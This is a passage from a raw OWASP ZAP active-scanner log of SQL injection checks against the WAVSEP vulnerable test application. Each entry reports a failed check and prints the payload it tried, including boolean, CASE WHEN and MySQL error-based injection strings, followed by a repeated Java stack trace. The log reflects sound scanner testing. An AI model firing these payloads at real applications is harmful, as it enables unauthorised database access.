org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679210 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 2415=6030-- LMrK] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 2415=6030-- LMrK at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679211 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 6393=6393-- sMHz] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 6393=6393-- sMHz at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679212 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 2228=2228-- WPWz] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 2228=2228-- WPWz at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679213 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 5558=4665-- uNzr] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 5558=4665-- uNzr at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679213 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 2415=6030-- LMrK] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 2415=6030-- LMrK at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679214 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (7540=8361) THEN 7540 ELSE 7540*(SELECT 7540 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (7540=8361) THEN 7540 ELSE 7540*(SELECT 7540 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679215 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (8313=6767) THEN 8313 ELSE 8313*(SELECT 8313 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (8313=6767) THEN 8313 ELSE 8313*(SELECT 8313 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679215 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (3870=3870) THEN 3870 ELSE 3870*(SELECT 3870 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (3870=3870) THEN 3870 ELSE 3870*(SELECT 3870 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679216 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (4107=4107) THEN 4107 ELSE 4107*(SELECT 4107 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (4107=4107) THEN 4107 ELSE 4107*(SELECT 4107 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679216 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (7540=8361) THEN 7540 ELSE 7540*(SELECT 7540 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (7540=8361) THEN 7540 ELSE 7540*(SELECT 7540 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679217 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (8313=6767) THEN 8313 ELSE 8313*(SELECT 8313 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (8313=6767) THEN 8313 ELSE 8313*(SELECT 8313 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679218 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND (SELECT 3903 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(3903=3903,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1917=1917] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND (SELECT 3903 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(3903=3903,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1917=1917 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679219 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND (SELECT 2005 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2005=2005,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND (SELECT 2005 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2005=2005,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679219 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND (SELECT 4144 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4144=4144,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3857=3857] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 